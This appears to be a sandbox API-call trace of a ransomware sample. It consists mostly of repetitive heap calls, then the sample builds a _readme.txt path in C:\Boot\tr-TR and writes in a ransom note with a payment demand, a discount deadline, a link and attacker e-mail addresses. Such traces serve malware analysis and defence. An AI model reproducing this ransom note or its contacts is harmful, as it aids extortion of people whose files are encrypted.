HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.357] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0184.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.357] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.358] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.358] PathFindFileNameW (pszPath="") returned="" [0184.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.358] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.358] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0184.358] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0184.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.359] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.359] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0184.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.359] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0184.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.359] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.359] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.359] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.361] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*" (normalized: "c:\\boot\\tr-tr\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 